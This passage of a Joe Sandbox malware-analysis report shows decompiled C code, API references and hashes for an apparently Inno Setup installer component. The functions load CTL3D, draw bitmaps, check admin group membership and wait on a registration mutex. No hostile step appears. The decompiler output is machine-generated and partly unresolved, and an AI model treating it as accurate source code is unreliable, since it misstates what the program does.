					L00405AA4();
					 *0x48c56c = _t15;
					return _t15;
				}
			}

0x0041f338
0x0041f497
0x0041f497
0x0041f497
0x0041f33e
0x0041f343
0x0041f348
0x0041f34c
0x0041f353
0x0041f35a
0x0041f36b
0x0041f374
0x0041f374
0x0041f353
0x0041f380
0x0041f382
0x0041f382
0x0041f393
0x00000000
0x0041f399
0x0041f399
0x0041f39e
0x0041f3a3
0x0041f3a4
0x0041f3a9
0x0041f3ae
0x0041f3b3
0x0041f3bc
0x0041f481
0x0041f487
0x0041f48c
0x00000000
0x0041f48c
0x0041f3c2
0x0041f3c7
0x0041f3cc
0x0041f3cd
0x0041f3d2
0x0041f3d7
0x0041f3dc
0x0041f3e1
0x0041f3e2
0x0041f3e7
0x0041f3ec
0x0041f3f1
0x0041f3f6
0x0041f3f7
0x0041f3fc
0x0041f401
0x0041f406
0x0041f40b
0x0041f40c
0x0041f411
0x0041f416
0x0041f41b
0x0041f420
0x0041f421
0x0041f426
0x0041f42b
0x0041f430
0x0041f435
0x0041f436
0x0041f43b
0x0041f440
0x0041f445
0x0041f44a
0x0041f44b
0x0041f450
0x0041f455
0x0041f45a
0x0041f45f
0x0041f460
0x0041f465
0x0041f46a
0x0041f46f
0x0041f474
0x0041f475
0x0041f47a
0x00000000
0x0041f47a

APIs

GetVersion.KERNEL32(?,00419208,00000000,?,?,00000001,00000000), ref: 0041F33E
SetErrorMode.KERNEL32(00008000,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F35A
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F366
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F374
6D2B5550.KERNEL32(00000001,Ctl3dRegister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3A4
6D2B5550.KERNEL32(00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3CD
6D2B5550.KERNEL32(00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3E2
6D2B5550.KERNEL32(00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F3F7
6D2B5550.KERNEL32(00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F40C
6D2B5550.KERNEL32(00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000,?,?,00000001), ref: 0041F421
6D2B5550.KERNEL32(00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208,00000000), ref: 0041F436
6D2B5550.KERNEL32(00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,00419208), ref: 0041F44B
6D2B5550.KERNEL32(00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister), ref: 0041F460
6D2B5550.KERNEL32(00000001,BtnWndProc3d,00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl), ref: 0041F475
FreeLibrary.KERNEL32(00000001,?,00419208,00000000,?,?,00000001,00000000), ref: 0041F487

Strings

BtnWndProc3d, xrefs: 0041F46A
Ctl3dUnAutoSubclass, xrefs: 0041F440
Ctl3dRegister, xrefs: 0041F399
Ctl3DColorChange, xrefs: 0041F455
Ctl3dDlgFramePaint, xrefs: 0041F401
CTL3D32.DLL, xrefs: 0041F361
Ctl3dAutoSubclass, xrefs: 0041F42B
Ctl3dCtlColorEx, xrefs: 0041F416
Ctl3dSubclassDlgEx, xrefs: 0041F3EC
Ctl3dUnregister, xrefs: 0041F3C2
Ctl3dSubclassCtl, xrefs: 0041F3D7

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 1872902828-3614243559
Opcode ID: bfc370baaf9c7f81fb8fa6dd250a2968227bca2fb7edd1cde8a0f605dc3758c4
Instruction ID: abf366189182d0570838c19227c35d070b01808c9469fe006c11eebae9a79656
Opcode Fuzzy Hash: bfc370baaf9c7f81fb8fa6dd250a2968227bca2fb7edd1cde8a0f605dc3758c4
Instruction Fuzzy Hash: 5631F271A51614BEEF10DFA5FEC5A5E3394A758304710097EB108DB192D77CA849CF2C

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC24 Relevance: 33.2, APIs: 22, Instructions: 213
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041CC24(void* __eax, int __ecx, intOrPtr __edx, char _a4, intOrPtr _a8, int _a12) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				struct tagRECT _v52;
				struct HDC__* _t58;
				void* _t60;
				intOrPtr _t71;
				struct HDC__* _t72;
				struct HBRUSH__* _t105;
				intOrPtr _t125;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t138;
				int _t141;
				int _t144;
				void* _t147;
				void* _t149;
				intOrPtr _t150;

				_t147 = _t149;
				_t150 = _t149 + 0xffffffd0;
				_t144 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t125 = _a8;
				_t141 = _a12;
				_v16 = 0;
				if(_v8 != 0 || __ecx != 0 && _t141 != 0) {
					_push(0);
					L00406034();
					_v28 = 0;
					_t58 = _v28;
					_push(_t58);
					L00405CDC();
					_v32 = _t58;
					_push(_t147);
					_push(0x41ce7a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t150;
					if(_a4 == 0) {
						_push(_t141);
						_push(_t144);
						_t60 = _v28;
						_push(_t60);
						L00405CD4();
						_v16 = _t60;
					} else {
						_push(0);
						_push(1);
						_push(1);
						_push(_t141);
						_push(_t144);
						L00405CC4();
						_v16 = 0;
					}
					if(_v16 == 0) {
						E0041B5AC();
					}
					_v24 = SelectObject(_v32, _v16);
					_push(_t147);
					_push(0x41ce33);
					_push( *[fs:eax]);
					 *[fs:eax] = _t150;
					if(_t125 == 0) {
						PatBlt(_v32, 0, 0, _t144, _t141, 0xff0062);
					} else {
						_t105 = E0041A8F8( *((intOrPtr*)(_t125 + 0x14)));
						E0040AE50(0, _t144, 0,  &_v52, _t141);
						FillRect(_v32,  &_v52, _t105);
						SetTextColor(_v32, E0041A270( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc)) + 0x10))));
						SetBkColor(_v32, E0041A270(E0041A8BC( *((intOrPtr*)(_t125 + 0x14)))));
					}
					if(_v8 == 0) {
						_pop(_t136);
						 *[fs:eax] = _t136;
						_pop(_t137);
						 *[fs:eax] = _t137;
						_push(0x41ce81);
						DeleteDC(_v32);
						_t71 = _v28;
						_push(_t71);
						_push(0);
						L0040621C();
						return _t71;
					} else {
						_t72 = _v28;
						_push(_t72);
						L00405CDC();
						_v36 = _t72;
						if(_v36 == 0) {
							E0041B5AC();
						}
						_push(_t147);
						_push(0x41ce22);
						_push( *[fs:eax]);
						 *[fs:eax] = _t150;
						E0041CA50(_v8);
						_v20 = SelectObject(_v36, _v8);
						if(_v12 != 0) {
							_push(1);
							_push(_v12);
							_push(_v36);
							L00405E34();
							_push(_v36);
							L00405DF4();
							_push(1);
							_push(_v12);
							_push(_v32);
							L00405E34();
							_push(_v32);
							L00405DF4();
						}
						if(_t125 != 0) {
							SetTextColor(_v36, E0041A270( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc)) + 0x10))));
							SetBkColor(_v36, E0041A270(E0041A8BC( *((intOrPtr*)(_t125 + 0x14)))));
						}
						_push(0xcc0020);
						_push(0);
						_push(0);
						_push(_v36);
						_push(_t141);
						_push(_t144);
						_push(0);
						_push(0);
						_push(_v32);
						L00405CB4();
						SelectObject(_v36, _v20);
						_pop(_t138);
						 *[fs:eax] = _t138;
						_push(0x41ce29);
						return DeleteDC(_v36);
					}
				} else {
					return _v16;
				}
			}

0x0041cc25
0x0041cc27
0x0041cc2d
0x0041cc2f
0x0041cc32
0x0041cc35
0x0041cc38
0x0041cc3d
0x0041cc44
0x0041cc56
0x0041cc58
0x0041cc5d
0x0041cc60
0x0041cc63
0x0041cc64
0x0041cc69
0x0041cc6e
0x0041cc6f
0x0041cc74
0x0041cc77
0x0041cc7e
0x0041cc92
0x0041cc93
0x0041cc94
0x0041cc97
0x0041cc98
0x0041cc9d
0x0041cc80
0x0041cc80
0x0041cc82
0x0041cc84
0x0041cc86
0x0041cc87
0x0041cc88
0x0041cc8d
0x0041cc8d
0x0041cca4
0x0041cca6
0x0041cca6
0x0041ccb8
0x0041ccbd
0x0041ccbe
0x0041ccc3
0x0041ccc6
0x0041cccb
0x0041cd30
0x0041cccd
0x0041ccd0
0x0041cce1
0x0041ccee
0x0041cd03
0x0041cd1a
0x0041cd1a
0x0041cd39
0x0041ce2b
0x0041ce2e
0x0041ce5a
0x0041ce5d
0x0041ce60
0x0041ce69
0x0041ce6e
0x0041ce71
0x0041ce72
0x0041ce74
0x0041ce79
0x0041cd3f
0x0041cd3f
0x0041cd42
0x0041cd43
0x0041cd48
0x0041cd4f
0x0041cd51
0x0041cd51
0x0041cd58
0x0041cd59
0x0041cd5e
0x0041cd61
0x0041cd67
0x0041cd79
0x0041cd80
0x0041cd82
0x0041cd87
0x0041cd8b
0x0041cd8c
0x0041cd94
0x0041cd95
0x0041cd9a
0x0041cd9f
0x0041cda3
0x0041cda4
0x0041cdac
0x0041cdad
0x0041cdad
0x0041cdb4
0x0041cdc6
0x0041cddd
0x0041cddd
0x0041cde2
0x0041cde7
0x0041cde9
0x0041cdee
0x0041cdef
0x0041cdf0
0x0041cdf1
0x0041cdf3
0x0041cdf8
0x0041cdf9
0x0041ce06
0x0041ce0d
0x0041ce10
0x0041ce13
0x0041ce21
0x0041ce21
0x0041ce81
0x0041ce8a
0x0041ce8a

APIs

740BAC50.USER32(00000000,?,0041AB5C,?), ref: 0041CC58
740BA590.GDI32(?,00000000,?,0041AB5C,?), ref: 0041CC64
740BA410.GDI32(0041AB5C,?,00000001,00000001,00000000,00000000,0041CE7A,?,?,00000000,?,0041AB5C,?), ref: 0041CC88
740BA520.GDI32(?,0041AB5C,?,00000000,0041CE7A,?,?,00000000,?,0041AB5C,?), ref: 0041CC98
SelectObject.GDI32(0041D054,00000000), ref: 0041CCB3
FillRect.USER32 ref: 0041CCEE
SetTextColor.GDI32(0041D054,00000000), ref: 0041CD03
SetBkColor.GDI32(0041D054,00000000), ref: 0041CD1A
PatBlt.GDI32(0041D054,00000000,00000000,0041AB5C,?,00FF0062), ref: 0041CD30
740BA590.GDI32(?,00000000,0041CE33,?,0041D054,00000000,?,0041AB5C,?,00000000,0041CE7A,?,?,00000000,?,0041AB5C), ref: 0041CD43
SelectObject.GDI32(00000000,00000000), ref: 0041CD74
740BB410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CE22,?,?,00000000,0041CE33,?,0041D054,00000000,?,0041AB5C), ref: 0041CD8C
740BB150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CE22,?,?,00000000,0041CE33,?,0041D054,00000000,?), ref: 0041CD95
740BB410.GDI32(0041D054,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CE22,?,?,00000000,0041CE33), ref: 0041CDA4
740BB150.GDI32(0041D054,0041D054,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CE22,?,?,00000000,0041CE33), ref: 0041CDAD
SetTextColor.GDI32(00000000,00000000), ref: 0041CDC6
SetBkColor.GDI32(00000000,00000000), ref: 0041CDDD
740C97E0.GDI32(0041D054,00000000,00000000,0041AB5C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CE22,?,?,00000000), ref: 0041CDF9
SelectObject.GDI32(00000000,?), ref: 0041CE06
DeleteDC.GDI32(00000000), ref: 0041CE1C

Part of subcall function 0041A270: GetSysColor.USER32(?), ref: 0041A27A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Color$ObjectSelect$A590B150B410Text$A410A520DeleteFillRect
String ID:
API String ID: 161883734-0
Opcode ID: 944c1c95d1dca08d2a74b660a3b506fc8d4a7edc4657660e861d659317bdacc3
Instruction ID: 2dcfbf729b2cf2b3e275a9ab9bf4f5d19ed99089cd167bdae99dd7ee67551e46
Opcode Fuzzy Hash: 944c1c95d1dca08d2a74b660a3b506fc8d4a7edc4657660e861d659317bdacc3
Instruction Fuzzy Hash: 7461CC71A44618AFDF10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67C9941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0042DFF0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0042DFF0(long __eax, void* __edi) {
				char _v5;
				void* _v12;
				signed int _v16;
				void* _v20;
				long _v24;
				void* _v28;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t95;
				signed int _t96;
				intOrPtr _t101;
				intOrPtr _t102;
				void* _t107;
				void* _t108;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xffffffe8;
				if( *0x48c0e0 == 2) {
					_v5 = 0;
					if(AllocateAndInitializeSid( &E0048C79C, 2, 0x20, __eax, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						goto L26;
					} else {
						_push(_t110);
						_push(0x42e1d4);
						_push( *[fs:eax]);
						 *[fs:eax] = _t113;
						_t95 = 0;
						if((GetVersion() & 0x000000ff) >= 5) {
							_push("CheckTokenMembership");
							_t91 = GetModuleHandleA("advapi32.dll");
							_push(_t91);
							L00405AA4();
							_t95 = _t91;
						}
						if(_t95 == 0) {
							_v28 = 0;
							if(OpenThreadToken(GetCurrentThread(), 8, 1,  &_v20) != 0) {
								L13:
								_push(_t110);
								_push(0x42e1b6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t113;
								_v24 = 0;
								if(GetTokenInformation(_v20, 2, 0, 0,  &_v24) != 0 || GetLastError() == 0x7a) {
									_v28 = E00402650(_v24);
									if(GetTokenInformation(_v20, 2, _v28, _v24,  &_v24) != 0) {
										_t107 =  *_v28 - 1;
										if(_t107 >= 0) {
											_t108 = _t107 + 1;
											_t96 = 0;
											while(EqualSid(_v12,  *(_v28 + 4 + _t96 * 8)) == 0 || ( *(_v28 + 8 + _t96 * 8) & 0x00000014) != 4) {
												_t96 = _t96 + 1;
												_t108 = _t108 - 1;
												if(_t108 != 0) {
													continue;
												}
												goto L24;
											}
											_v5 = 1;
										}
										L24:
										_pop(_t101);
										 *[fs:eax] = _t101;
										_push(E0042E1BD);
										E00402668(_v28);
										return CloseHandle(_v20);
									} else {
										E00403304();
										E00403304();
										goto L26;
									}
								} else {
									E00403304();
									E00403304();
									goto L26;
								}
							} else {
								if(GetLastError() == 0x3f0) {
									if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
										goto L13;
									} else {
										E00403304();
										goto L26;
									}
								} else {
									E00403304();
									goto L26;
								}
							}
						} else {
							_push( &_v16);
							_push(_v12);
							_push(0);
							if(_t95->i() != 0) {
								asm("sbb eax, eax");
								_v5 =  ~( ~_v16);
							}
							_pop(_t102);
							 *[fs:eax] = _t102;
							_push(E0042E1DB);
							return FreeSid(_v12);
						}
					}
				} else {
					_v5 = 1;
					L26:
					return _v5;
				}
			}

0x0042dff1
0x0042dff3
0x0042e001
0x0042e00c
0x0042e031
0x00000000
0x0042e037
0x0042e039
0x0042e03a
0x0042e03f
0x0042e042
0x0042e045
0x0042e054
0x0042e056
0x0042e060
0x0042e065
0x0042e066
0x0042e06b
0x0042e06b
0x0042e06f
0x0042e098
0x0042e0b0
0x0042e0e7
0x0042e0e9
0x0042e0ea
0x0042e0ef
0x0042e0f2
0x0042e0f7
0x0042e10f
0x0042e132
0x0042e14e
0x0042e161
0x0042e164
0x0042e166
0x0042e167
0x0042e169
0x0042e193
0x0042e194
0x0042e195
0x00000000
0x00000000
0x00000000
0x0042e195
0x0042e18d
0x0042e18d
0x0042e197
0x0042e199
0x0042e19c
0x0042e19f
0x0042e1a7
0x0042e1b5
0x0042e150
0x0042e150
0x0042e155
0x00000000
0x0042e155
0x0042e11b
0x0042e11b
0x0042e120
0x00000000
0x0042e120
0x0042e0b2
0x0042e0bc
0x0042e0db
0x00000000
0x0042e0dd
0x0042e0dd
0x00000000
0x0042e0dd
0x0042e0be
0x0042e0be
0x00000000
0x0042e0be
0x0042e0bc
0x0042e071
0x0042e074
0x0042e078
0x0042e079
0x0042e07f
0x0042e08a
0x0042e08e
0x0042e08e
0x0042e1bf
0x0042e1c2
0x0042e1c5
0x0042e1d3
0x0042e1d3
0x0042e06f
0x0042e003
0x0042e003
0x0042e1db
0x0042e1e3
0x0042e1e3

APIs

AllocateAndInitializeSid.ADVAPI32(0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E02A
GetVersion.KERNEL32(00000000,0042E1D4,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E047
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1D4,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E060
6D2B5550.KERNEL32(00000000,advapi32.dll,CheckTokenMembership,00000000,0042E1D4,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E066
FreeSid.ADVAPI32(00000000,0042E1DB,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1CE

Strings

CheckTokenMembership, xrefs: 0042E056
advapi32.dll, xrefs: 0042E05B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: AllocateB5550FreeHandleInitializeModuleVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4223733700-1888249752
Opcode ID: 0a343d7191ddbb138dd306094067531a40a914f36f96b9cd5ffafa6658afd810
Instruction ID: 5b182264c5db843ab3fed9760e8fc3029a527c853adf20fb54b9cacce15076cf
Opcode Fuzzy Hash: 0a343d7191ddbb138dd306094067531a40a914f36f96b9cd5ffafa6658afd810
Instruction Fuzzy Hash: 8D518671B04615AADB10EAE79C82FBF77ACDB04704F54047BBA01E62C2D67CD9118B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0048AB3C Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 247
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0048AB3C(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v6;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v52;
				char _t62;
				void* _t89;
				void* _t119;
				intOrPtr _t121;
				intOrPtr _t125;
				char _t126;
				char _t130;
				char _t134;
				char _t137;
				long _t149;
				void* _t153;
				intOrPtr _t174;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t188;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t198;

				_t195 = __esi;
				_t194 = __edi;
				_t197 = _t198;
				_t153 = 6;
				do {
					_push(0);
					_push(0);
					_t153 = _t153 - 1;
				} while (_t153 != 0);
				_push(__esi);
				_push(__edi);
				_push(_t197);
				_push(0x48aee9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t198;
				E0042D468(1, 0x48d628,  &_v44, __edi, __esi);
				if(E00406B28(_v44, 0x48af00) != 0) {
					E0042D468(1, 0x48d628,  &_v44, __edi, __esi);
					_t62 = E00406B28(_v44, 0x48af10);
					__eflags = _t62;
					if(_t62 != 0) {
						__eflags = 0;
						_pop(_t174);
						 *[fs:eax] = _t174;
						_push(E0048AEF0);
						return E00403568( &_v52, 9);
					} else {
						_v5 = 0;
						goto L6;
					}
				} else {
					_v5 = 1;
					L6:
					E004244DC( *0x48d628, 0x48af20, _t194);
					ShowWindow( *( *0x48d628 + 0x20), 5);
					E00473CC0();
					_v12 = CreateMutexA(0, 0, "Inno-Setup-RegSvr-Mutex");
					ShowWindow( *( *0x48d628 + 0x20), 0);
					if(_v12 != 0) {
						do {
							E004246C4( *0x48d628);
							_t149 = MsgWaitForMultipleObjects(1,  &_v12, 0, 0xffffffff, 0xff);
							_t202 = _t149 == 1;
						} while (_t149 == 1);
					}
					ShowWindow( *( *0x48d628 + 0x20), 5);
					_push(_t197);
					_push(0x48aec7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t198;
					E0042D468(0, 0x48d628,  &_v44, _t194, _t195);
					E0042C6B8(_v44, 0x48d628,  &_v20, 0x48af48, _t194, _t195, _t202);
					E0042D468(0, 0x48d628,  &_v44, _t194, _t195);
					E0042C6B8(_v44, 0x48d628,  &_v24, 0x48af58, _t194, _t195, _t202);
					_t89 = E0042CE14(_t202);
					_t203 = _t89;
					if(_t89 == 0) {
						E00407064(_v24);
						E00407064(_v20);
						_push(_t197);
						_push( *[fs:eax]);
						 *[fs:eax] = _t198;
						E0048AA00(0x48d628,  &_v24, _t194, _t195, __eflags);
						_pop(_t181);
						 *[fs:eax] = _t181;
						_t182 = 0x48ae97;
						 *[fs:eax] = _t182;
						_push(E0048AECE);
						__eflags = _v12;
						if(_v12 != 0) {
							ReleaseMutex(_v12);
							return CloseHandle(_v12);
						}
						return 0;
					} else {
						E00450DB0(_v20, 0x48d628, 0, 0, _t194, _t195, _t203);
						_t184 =  *0x48ddc0; // 0x21eb5b8
						E004244DC( *0x48d628, _t184, _t194);
						E00452118( &_v28, 0x48d628, _t184, _t194, _t195);
						_push(_t197);
						_push(0x48ae63);
						_push( *[fs:eax]);
						 *[fs:eax] = _t198;
						E0048AAA4(_v28, 0x48d628,  &_v32, _t194, _t195);
						_v16 = E0044FF24(_v24, 1, 1, 0, 2);
						_push(_t197);
						_push(0x48ae2b);
						_push( *[fs:eax]);
						 *[fs:eax] = _t198;
						while(E004502B0(_v16) == 0) {
							E004502C0(_v16, 0x48d628,  &_v36, _t194, _t195);
							_t119 = E004036BC(_v36);
							__eflags = _t119 - 4;
							if(_t119 > 4) {
								__eflags =  *_v36 - 0x5b;
								if( *_v36 == 0x5b) {
									_t121 = _v36;
									__eflags =  *((char*)(_t121 + 3)) - 0x5d;
									if( *((char*)(_t121 + 3)) == 0x5d) {
										E004038C0(_v36, 0x7fffffff, 5,  &_v40);
										_t125 = _v36;
										__eflags =  *((char*)(_t125 + 2)) - 0x71;
										if( *((char*)(_t125 + 2)) == 0x71) {
											L17:
											_t126 = 1;
										} else {
											__eflags = _v5;
											if(_v5 == 0) {
												L16:
												_t126 = 0;
											} else {
												__eflags =  *0x4ae252;
												if( *0x4ae252 == 0) {
													goto L17;
												} else {
													goto L16;
												}
											}
										}
										_v6 = _t126;
										_push(_t197);
										_push(0x48ad9b);
										_push( *[fs:eax]);
										 *[fs:eax] = _t198;
										_t39 = _v36 + 1; // 0xfff77da0
										_t130 =  *_t39 - 0x53;
										__eflags = _t130;
										if(__eflags == 0) {
											E00456530(0, 0x48d628, _v6, _v40, _t194, _t195, __eflags);
										} else {
											_t134 = _t130 - 1;
											__eflags = _t134;
											if(_t134 == 0) {
												__eflags = 0;
												E004566E4(0, 0x48d628, _v40, _t194, _t195);
											} else {
												_t137 = _t134 - 0x1f;
												__eflags = _t137;
												if(_t137 == 0) {
													E00454394(_v6);
												} else {
													__eflags = _t137 == 1;
													if(_t137 == 1) {
														E00454A9C(_v40, 0x48d628, _t194, _t195);
													}
												}
											}
										}
										_pop(_t191);
										 *[fs:eax] = _t191;
									}
								}
							}
						}
						_pop(_t188);
						 *[fs:eax] = _t188;
						_push(E0048AE32);
						return E00402CA0(_v16);
					}
				}
			}

0x0048ab3c
0x0048ab3c
0x0048ab3d
0x0048ab3f
0x0048ab44
0x0048ab44
0x0048ab46
0x0048ab48
0x0048ab48
0x0048ab4c
0x0048ab4d
0x0048ab55
0x0048ab56
0x0048ab5b
0x0048ab5e
0x0048ab69
0x0048ab7d
0x0048ab8d
0x0048ab9a
0x0048ab9f
0x0048aba1
0x0048aece
0x0048aed0
0x0048aed3
0x0048aed6
0x0048aee8
0x0048aba7
0x0048aba7
0x00000000
0x0048aba7
0x0048ab7f
0x0048ab7f
0x0048abab
0x0048abb2
0x0048abbf
0x0048abc4
0x0048abd7
0x0048abe2
0x0048abeb
0x0048abed
0x0048abef
0x0048ac03
0x0048ac08
0x0048ac08
0x0048abed
0x0048ac13
0x0048ac1a
0x0048ac1b
0x0048ac20
0x0048ac23
0x0048ac2b
0x0048ac3b
0x0048ac45
0x0048ac55
0x0048ac5d
0x0048ac62
0x0048ac64
0x0048ae6d
0x0048ae75
0x0048ae7c
0x0048ae82
0x0048ae85
0x0048ae88
0x0048ae8f
0x0048ae92
0x0048aea3
0x0048aea6
0x0048aea9
0x0048aeae
0x0048aeb2
0x0048aeb8
0x00000000
0x0048aec1
0x0048aec6
0x0048ac6a
0x0048ac71
0x0048ac76
0x0048ac7e
0x0048ac86
0x0048ac8d
0x0048ac8e
0x0048ac93
0x0048ac96
0x0048ac9f
0x0048acb9
0x0048acbe
0x0048acbf
0x0048acc4
0x0048acc7
0x0048ae05
0x0048acd5
0x0048acdd
0x0048ace2
0x0048ace5
0x0048acee
0x0048acf1
0x0048acf7
0x0048acfa
0x0048acfe
0x0048ad15
0x0048ad1a
0x0048ad1d
0x0048ad21
0x0048ad36
0x0048ad36
0x0048ad23
0x0048ad23
0x0048ad27
0x0048ad32
0x0048ad32
0x0048ad29
0x0048ad29
0x0048ad30
0x00000000
0x00000000
0x00000000
0x00000000
0x0048ad30
0x0048ad27
0x0048ad38
0x0048ad3d
0x0048ad3e
0x0048ad43
0x0048ad46
0x0048ad4c
0x0048ad4f
0x0048ad4f
0x0048ad51
0x0048ad76
0x0048ad53
0x0048ad53
0x0048ad53
0x0048ad55
0x0048ad8a
0x0048ad8c
0x0048ad57
0x0048ad57
0x0048ad57
0x0048ad59
0x0048ad67
0x0048ad5b
0x0048ad5b
0x0048ad5d
0x0048ad80
0x0048ad80
0x0048ad5d
0x0048ad59
0x0048ad55
0x0048ad93
0x0048ad96
0x0048ad96
0x0048acfe
0x0048acf1
0x0048ace5
0x0048ae17
0x0048ae1a
0x0048ae1d
0x0048ae2a
0x0048ae2a
0x0048ac64

APIs

ShowWindow.USER32(?,00000005,00000000,0048AEE9,?,?,00000000,?,00000000,00000000,?,0048B209,00000000,0048B213,?,00000000), ref: 0048ABBF
